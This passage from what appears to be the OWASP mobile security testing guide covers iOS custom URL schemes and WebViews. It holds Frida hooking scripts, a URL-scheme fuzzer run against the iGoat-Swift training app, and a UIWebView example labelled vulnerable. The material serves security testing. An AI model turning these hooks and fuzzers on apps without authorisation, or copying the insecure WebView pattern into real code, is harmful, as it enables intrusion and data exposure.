<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>dbapi-3</string>\n <string>instagram</string>\n <string>googledrive</string>\n <string>comgooglemaps-x-callback</string>\n <string>foursquare</string>\n <string>here-location</string>\n <string>yandexmaps</string>\n <string>yandexnavi</string>\n <string>comgooglemaps</string>\n <string>youtube</string>\n <string>twitter</string>\n ...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-handling-and-validation","title":"Testing URL Handling and Validation","text":"In order to determine how a URL path is built and validated, if you have the original source code, you can search for the following methods:
application:didFinishLaunchingWithOptions:
method or application:will-FinishLaunchingWithOptions:
: verify how the decision is made and how the information about the URL is retrieved.application:openURL:options:
: verify how the resource is being opened, i.e. how the data is being parsed, verify the options, especially if access by the calling app (sourceApplication
) should be allowed or denied. The app might also need user permission when using the custom URL scheme.In Telegram you will find four different methods being used:
func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, open url: URL, sourceApplication: String?,\nannotation: Any) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ app: UIApplication, open url: URL,\noptions: [UIApplicationOpenURLOptionsKey : Any] = [:]) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, handleOpen url: URL) -> Bool {\n self.openUrl(url: url)\n return true\n}\n
We can observe some things here:
application:handleOpenURL:
and application:openURL:sourceApplication:annotation:
.openUrl
method. You can inspect it to learn more about how the URL request is handled.The method openURL:options:completionHandler:
and the deprecated openURL:
method of UIApplication
are responsible for opening URLs (i.e. to send requests / make queries to other apps) that may be local to the current app or it may be one that must be provided by a different app. If you have the original source code you can search directly for usages of those methods.
Additionally, if you are interested into knowing if the app is querying specific services or apps, and if the app is well-known, you can also search for common URL schemes online and include them in your greps. For example, a quick Google search reveals:
Apple Music - music:// or musics:// or audio-player-event://\nCalendar - calshow:// or x-apple-calevent://\nContacts - contacts://\nDiagnostics - diagnostics:// or diags://\nGarageBand - garageband://\niBooks - ibooks:// or itms-books:// or itms-bookss://\nMail - message:// or mailto://emailaddress\nMessages - sms://phonenumber\nNotes - mobilenotes://\n...\n
We search for this method in the Telegram source code, this time without using Xcode, just with egrep
:
$ egrep -nr \"open.*options.*completionHandler\" ./Telegram-iOS/\n\n./AppDelegate.swift:552: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n./AppDelegate.swift:556: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n
If we inspect the results we will see that openURL:options:completionHandler:
is actually being used for universal links, so we have to keep searching. For example, we can search for openURL(
:
$ egrep -nr \"openURL\\(\" ./Telegram-iOS/\n\n./ApplicationContext.swift:763: UIApplication.shared.openURL(parsedUrl)\n./ApplicationContext.swift:792: UIApplication.shared.openURL(URL(\n string: \"https://telegram.org/deactivate?phone=\\(phone)\")!\n )\n./AppDelegate.swift:423: UIApplication.shared.openURL(url)\n./AppDelegate.swift:538: UIApplication.shared.openURL(parsedUrl)\n...\n
If we inspect those lines we will see how this method is also being used to open \"Settings\" or to open the \"App Store Page\".
When just searching for ://
we see:
if documentUri.hasPrefix(\"file://\"), let path = URL(string: documentUri)?.path {\nif !url.hasPrefix(\"mt-encrypted-file://?\") {\nguard let dict = TGStringUtils.argumentDictionary(inUrlString: String(url[url.index(url.startIndex,\n offsetBy: \"mt-encrypted-file://?\".count)...])) else {\nparsedUrl = URL(string: \"https://\\(url)\")\nif let url = URL(string: \"itms-apps://itunes.apple.com/app/id\\(appStoreId)\") {\n} else if let url = url as? String, url.lowercased().hasPrefix(\"tg://\") {\n[[WKExtension sharedExtension] openSystemURL:[NSURL URLWithString:[NSString\n stringWithFormat:@\"tel://%@\", userHandle.data]]];\n
After combining the results of both searches and carefully inspecting the source code we find the following piece of code:
openUrl: { url in\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n if parsed.scheme == \"tg\" {\n return\n }\n }\n\n if let parsedUrl = parsedUrl {\n UIApplication.shared.openURL(parsedUrl)\n
Before opening a URL, the scheme is validated, \"https\" will be added if necessary and it won't open any URL with the \"tg\" scheme. When ready it will use the deprecated openURL
method.
If only having the compiled application (IPA) you can still try to identify which URL schemes are being used to query other apps:
LSApplicationQueriesSchemes
was declared or search for common URL schemes.://
or build a regular expression to match URLs as the app might not be declaring some schemes.You can do that by first verifying that the app binary contains those strings by e.g. using unix strings
command:
strings <yourapp> | grep \"someURLscheme://\"\n
or even better, use radare2's iz/izz
command or rafind2, both will find strings where the unix strings
command won't. Example from iGoat-Swift:
$ r2 -qc izz~iGoat:// iGoat-Swift\n37436 0x001ee610 0x001ee610 23 24 (4.__TEXT.__cstring) ascii iGoat://?contactNumber=\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
For example, here we find those three:
$ rabin2 -zzq Telegram\\ X.app/Telegram\\ X | grep -i \"openurl\"\n\n0x1000d9e90 31 30 UIApplicationOpenURLOptionsKey\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000dee8e 27 26 application:handleOpenURL:\n0x1000df2c9 9 8 openURL:\n0x1000df766 12 11 canOpenURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamic-analysis","title":"Dynamic Analysis","text":"Once you've identified the custom URL schemes the app has registered, there are several methods that you can use to test them:
To quickly test one URL scheme you can open the URLs on Safari and observe how the app behaves. For example, if you write tel://123456789
in the address bar of Safari, a pop up will appear with the telephone number and the options \"Cancel\" and \"Call\". If you press \"Call\" it will open the Phone app and directly make the call.
You may also know already about pages that trigger custom URL schemes, you can just navigate normally to those pages and Safari will automatically ask when it finds a custom URL scheme.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-the-notes-app","title":"Using the Notes App","text":"As already seen in \"Triggering Universal Links\", you may use the Notes app and long press the links you've written in order to test custom URL schemes. Remember to exit the editing mode in order to be able to open them. Note that you can click or long press links including custom URL schemes only if the app is installed, if not they won't be highlighted as clickable links.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida","title":"Using Frida","text":"If you simply want to open the URL scheme you can do it using Frida:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n[iPhone::iGoat-Swift]-> openURL(\"tel://234234234\")\ntrue\n
In this example from Frida CodeShare the author uses the non-public API LSApplication Workspace.openSensitiveURL:withOptions:
to open the URLs (from the SpringBoard app):
function openURL(url) {\n var w = ObjC.classes.LSApplicationWorkspace.defaultWorkspace();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return w.openSensitiveURL_withOptions_(toOpen, null);\n}\n
Note that the use of non-public APIs is not permitted on the App Store, that's why we don't even test these but we are allowed to use them for our dynamic analysis.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#identifying-and-hooking-the-url-handler-method","title":"Identifying and Hooking the URL Handler Method","text":"If you can't look into the original source code you will have to find out yourself which method does the app use to handle the URL scheme requests that it receives. You cannot know if it is an Objective-C method or a Swift one, or even if the app is using a deprecated one.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#crafting-the-link-yourself-and-letting-safari-open-it","title":"Crafting the Link Yourself and Letting Safari Open It","text":"For this we will use the ObjC method observer from Frida CodeShare, which is an extremely handy script that allows you to quickly observe any collection of methods or classes just by providing a simple pattern.
In this case we are interested into all methods containing \"openURL\", therefore our pattern will be *[* *openURL*]
:
-
and class +
methods.openURL
.$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\nObserving -[_UIDICActivityItemProvider activityViewController:openURLAnnotationForActivityType:]\nObserving -[CNQuickActionsManager _openURL:]\nObserving -[SUClientController openURL:]\nObserving -[SUClientController openURL:inClientWithIdentifier:]\nObserving -[FBSSystemService openURL:application:options:clientPort:withResult:]\nObserving -[iGoat_Swift.AppDelegate application:openURL:options:]\nObserving -[PrefsUILinkLabel openURL:]\nObserving -[UIApplication openURL:]\nObserving -[UIApplication _openURL:]\nObserving -[UIApplication openURL:options:completionHandler:]\nObserving -[UIApplication openURL:withCompletionHandler:]\nObserving -[UIApplication _openURL:originatingView:completionHandler:]\nObserving -[SUApplication application:openURL:sourceApplication:annotation:]\n...\n
The list is very long and includes the methods we have already mentioned. If we trigger now one URL scheme, for example \"igoat://\" from Safari and accept to open it in the app we will see the following:
[iPhone::iGoat-Swift]-> (0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: igoat://\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\n0x1817e1048 libdispatch.dylib!_dispatch_client_callout\n0x1817e86c8 libdispatch.dylib!_dispatch_block_invoke_direct$VARIANT$mp\n0x18453d9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\n0x18453d698 FrontBoardServices!-[FBSSerialQueue _performNext]\nRET: 0x1\n
Now we know that:
-[iGoat_Swift.AppDelegate application:openURL:options:]
gets called. As we have seen before, it is the recommended way and it is not deprecated.igoat://
.com.apple.mobilesafari
.-[UIApplication _applicationOpenURLAction:payload:origin:]
.0x1
which means YES
(the delegate successfully handled the request).The call was successful and we see now that the iGoat app was open:
Notice that we can also see that the caller (source application) was Safari if we look in the upper-left corner of the screenshot.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamically-opening-the-link-from-the-app-itself","title":"Dynamically Opening the Link from the App Itself","text":"It is also interesting to see which other methods get called on the way. To change the result a little bit we will call the same URL scheme from the iGoat app itself. We will use again ObjC method observer and the Frida REPL:
$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\n\n(0x1c409e460) -[__NSXPCInterfaceProxy__LSDOpenProtocol openURL:options:completionHandler:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: nil\ncompletionHandler: <__NSStackBlock__: 0x16fc89c38>\n0x183befbec MobileCoreServices!-[LSApplicationWorkspace openURL:withOptions:error:]\n0x10ba6400c\n...\nRET: nil\n\n...\n\n(0x101d0fad0) -[UIApplication openURL:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\n0x10a610044\n...\nRET: 0x1\n\ntrue\n(0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"OWASP.iGoat-Swift\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\nRET: 0x1\n
The output is truncated for better readability. This time you see that UIApplicationOpenURLOptionsSourceApplicationKey
has changed to OWASP.iGoat-Swift
, which makes sense. In addition, a long list of openURL
-like methods were called. Considering this information can be very useful for some scenarios as it will help you to decide what you next steps will be, e.g. which method you will hook or tamper with next.
You can now test the same situation when clicking on a link contained on a page. Safari will identify and process the URL scheme and choose which action to execute. Opening this link \"https://telegram.me/fridadotre\" will trigger this behavior.
First of all we let frida-trace generate the stubs for us:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n...\n7310 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n7311 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n7312 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14Open\n URLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF()\n
Now we can simply modify by hand the stubs we are interested in:
The Objective-C method application:openURL:options:
:
// __handlers__/__AppDelegate_application_openUR_3679fadc.js\n\nonEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] +\n \" openURL: \" + args[3] + \" options: \" + args[4] + \"]\");\n log(\"\\tapplication :\" + ObjC.Object(args[2]).toString());\n log(\"\\topenURL :\" + ObjC.Object(args[3]).toString());\n log(\"\\toptions :\" + ObjC.Object(args[4]).toString());\n},\n
The Swift method $S10TelegramUI15openExternalUrl...
:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\nonEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account, url, presentationData,\" +\n \"applicationContext, navigationController, dismissInput)\");\n log(\"\\taccount: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n},\n
The next time we run it, we see the following output:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n 8144 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n 8145 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n 8145 ms | application: <Application: 0x105a59980>\n 8145 ms | openURL: tg://resolve?domain=fridadotre\n 8145 ms | options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n }\n 8269 ms | | TelegramUI.openExternalUrl(account, url, presentationData,\n applicationContext, navigationController, dismissInput)\n 8269 ms | | account: nil\n 8269 ms | | url: tg://resolve?domain=fridadotre\n 8269 ms | | presentationData: 0x1c4c51741\n 8269 ms | | applicationContext: nil\n 8269 ms | | navigationController: TelegramUI.PresentationData\n 8274 ms | -[UIApplication applicationOpenURL:0x1c46ebb80]\n
There you can observe the following:
application:openURL:options:
from the app delegate as expected.application:openURL:options:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.tg://resolve?domain=fridadotre
.tg://
custom URL scheme from Telegram.It is interesting to see that if you navigate again to \"https://telegram.me/fridadotre\", click on cancel and then click on the link offered by the page itself (\"Open in the Telegram app\"), instead of opening via custom URL scheme it will open via universal links.
You can try this while tracing both methods:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -m \"*[* *application*openURL*options*]\"\n\n// After clicking \"Open\" on the pop-up\n\n 16374 ms -[AppDelegate application :0x10556b3c0 openURL :0x1c4ae0080 options :0x1c7a28400]\n 16374 ms application :<Application: 0x10556b3c0>\n 16374 ms openURL :tg://resolve?domain=fridadotre\n 16374 ms options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n\n// After clicking \"Cancel\" on the pop-up and \"OPEN\" in the page\n\n406575 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c063d0c0\n restorationHandler:0x16f27a898]\n406575 ms application:<Application: 0x10556b3c0>\n406575 ms continueUserActivity:<NSUserActivity: 0x1c063d0c0>\n406575 ms webpageURL:https://telegram.me/fridadotre\n406575 ms activityType:NSUserActivityTypeBrowsingWeb\n406575 ms userInfo:{\n}\n406575 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods_1","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
You may simply use frida-trace for this, to see if any of those methods are being used.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-schemes-source-validation","title":"Testing URL Schemes Source Validation","text":"A way to discard or confirm validation could be by hooking typical methods that might be used for that. For example isEqualToString:
:
// - (BOOL)isEqualToString:(NSString *)aString;\n\nvar isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\nInterceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n});\n
If we apply this hook and call the URL scheme again:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> var isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\n Interceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n });\n{}\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\ntrue\nnil\n
Nothing happens. This tells us already that this method is not being used for that as we cannot find any app-package-looking string like OWASP.iGoat-Swift
or com.apple.mobilesafari
between the hook and the text of the tweet. However, consider that we are just probing one method, the app might be using other approach for the comparison.
If the app parses parts of the URL, you can also perform input fuzzing to detect memory corruption bugs.
What we have learned above can be now used to build your own fuzzer on the language of your choice, e.g. in Python and call the openURL
using Frida's RPC. That fuzzer should do the following:
openURL
..ips
) in /private/var/mobile/Library/Logs/CrashReporter
.The FuzzDB project offers fuzzing dictionaries that you can use as payloads.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida_1","title":"Using Frida","text":"Doing this with Frida is pretty easy, as explained in this blog post to see an example that fuzzes the iGoat-Swift app (working on iOS 11.1.2).
Before running the fuzzer we need the URL schemes as inputs. From the static analysis we know that the iGoat-Swift app supports the following URL scheme and parameters: iGoat://?contactNumber={0}&message={0}
.
$ frida -U SpringBoard -l ios-url-scheme-fuzzing.js\n[iPhone::SpringBoard]-> fuzz(\"iGoat\", \"iGoat://?contactNumber={0}&message={0}\")\nWatching for crashes from iGoat...\nNo logs were moved.\nOpened URL: iGoat://?contactNumber=0&message=0\nOK!\nOpened URL: iGoat://?contactNumber=1&message=1\nOK!\nOpened URL: iGoat://?contactNumber=-1&message=-1\nOK!\nOpened URL: iGoat://?contactNumber=null&message=null\nOK!\nOpened URL: iGoat://?contactNumber=nil&message=nil\nOK!\nOpened URL: iGoat://?contactNumber=99999999999999999999999999999999999\n&message=99999999999999999999999999999999999\nOK!\nOpened URL: iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: iGoat://?contactNumber='&message='\nOK!\nOpened URL: iGoat://?contactNumber=%20d&message=%20d\nOK!\nOpened URL: iGoat://?contactNumber=%20n&message=%20n\nOK!\nOpened URL: iGoat://?contactNumber=%20x&message=%20x\nOK!\nOpened URL: iGoat://?contactNumber=%20s&message=%20s\nOK!\n
The script will detect if a crash occurred. On this run it did not detect any crashed but for other apps this could be the case. We would be able to inspect the crash reports in /private/var/mobile/Library/Logs/CrashReporter
or in /tmp
if it was moved by the script.
For the static analysis we will focus mostly on the following points having UIWebView
and WKWebView
under scope.
Look out for usages of the above mentioned WebView classes by searching in Xcode.
In the compiled binary you can search in its symbols or strings like this:
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#uiwebview","title":"UIWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"UIWebView$\"\n489 0x0002fee9 0x10002fee9 9 10 (5.__TEXT.__cstring) ascii UIWebView\n896 0x0003c813 0x0003c813 24 25 () ascii @_OBJC_CLASS_$_UIWebView\n1754 0x00059599 0x00059599 23 24 () ascii _OBJC_CLASS_$_UIWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#wkwebview","title":"WKWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"WKWebView$\"\n490 0x0002fef3 0x10002fef3 9 10 (5.__TEXT.__cstring) ascii WKWebView\n625 0x00031670 0x100031670 17 18 (5.__TEXT.__cstring) ascii unwindToWKWebView\n904 0x0003c960 0x0003c960 24 25 () ascii @_OBJC_CLASS_$_WKWebView\n1757 0x000595e4 0x000595e4 23 24 () ascii _OBJC_CLASS_$_WKWebView\n
Alternatively you can also search for known methods of these WebView classes. For example, search for the method used to initialize a WKWebView (init(frame:configuration:)
):
$ rabin2 -zzq ./WheresMyBrowser | egrep \"WKWebView.*frame\"\n0x5c3ac 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x5d97a 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n0x6b5d5 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x6c3fa 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n
You can also demangle it:
$ xcrun swift-demangle __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n\n---> @nonobjc __C.WKWebView.init(frame: __C_Synthesized.CGRect,\n configuration: __C.WKWebViewConfiguration) -> __C.WKWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/","title":"Testing WebView Protocol Handlers","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#static-analysis","title":"Static Analysis","text":"If a WebView is loading content from the app data directory, users should not be able to change the filename or path from which the file is loaded, and they shouldn't be able to edit the loaded file.
This presents an issue especially in UIWebView
s loading untrusted content via the deprecated methods loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName: baseURL:
and setting the baseURL
parameter to nil
or to a file:
or applewebdata:
URL schemes. In this case, in order to prevent unauthorized access to local files, the best option is to set it instead to about:blank
. However, the recommendation is to avoid the use of UIWebView
s and switch to WKWebView
s instead.
Here's an example of a vulnerable UIWebView
from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/UIWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n uiWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
The page loads resources from the internet using HTTP, enabling a potential MITM to exfiltrate secrets contained in local files, e.g. in shared preferences.
When working with WKWebView
s, Apple recommends using loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName:baseURL:
to load local HTML files and loadRequest:
for web content. Typically, the local files are loaded in combination with methods including, among others: pathForResource:ofType:
, URLForResource:withExtension:
or init(contentsOf:encoding:)
.
Search the source code for the mentioned methods and inspect their parameters.
Example in Objective-C:
- (void)viewDidLoad\n{\n [super viewDidLoad];\n WKWebViewConfiguration *configuration = [[WKWebViewConfiguration alloc] init];\n\n self.webView = [[WKWebView alloc] initWithFrame:CGRectMake(10, 20,\n CGRectGetWidth([UIScreen mainScreen].bounds) - 20,\n CGRectGetHeight([UIScreen mainScreen].bounds) - 84) configuration:configuration];\n self.webView.navigationDelegate = self;\n [self.view addSubview:self.webView];\n\n NSString *filePath = [[NSBundle mainBundle] pathForResource:@\"example_file\" ofType:@\"html\"];\n NSString *html = [NSString stringWithContentsOfFile:filePath\n encoding:NSUTF8StringEncoding error:nil];\n [self.webView loadHTMLString:html baseURL:[NSBundle mainBundle].resourceURL];\n}\n
Example in Swift from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/WKWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n wkWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
If only having the compiled binary, you can also search for these methods, e.g.:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadHTMLString\"\n231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:\n
In a case like this, it is recommended to perform dynamic analysis to ensure that this is in fact being used and from which kind of WebView. The baseURL
parameter here doesn't present an issue as it will be set to \"null\" but could be an issue if not set properly when using a UIWebView
. See \"Checking How WebViews are Loaded\" for an example about this.
In addition, you should also verify if the app is using the method loadFileURL: allowingReadAccessToURL:
. Its first parameter is URL
and contains the URL to be loaded in the WebView, its second parameter allowingReadAccessToURL
may contain a single file or a directory. If containing a single file, that file will be available to the WebView. However, if it contains a directory, all files on that directory will be made available to the WebView. Therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it.
Example in Swift from \"Where's My Browser?\":
var scenario1Url = FileManager.default.urls(for: .libraryDirectory, in: .userDomainMask)[0]\nscenario1Url = scenario1Url.appendingPathComponent(\"WKWebView/scenario1.html\")\nwkWebView.loadFileURL(scenario1Url, allowingReadAccessTo: scenario1Url)\n
In this case, the parameter allowingReadAccessToURL
contains a single file \"WKWebView/scenario1.html\", meaning that the WebView has exclusively access to that file.
In the compiled binary:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadFileURL\"\n237 0x0002dff1 37 (4.__TEXT.__objc_methname) ascii loadFileURL:allowingReadAccessToURL:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#testing-webview-file-access","title":"Testing WebView File Access","text":"If you have found a UIWebView
being used, then the following applies:
file://
scheme is always enabled.file://
URLs is always enabled.file://
URLs is always enabled.Regarding WKWebView
s:
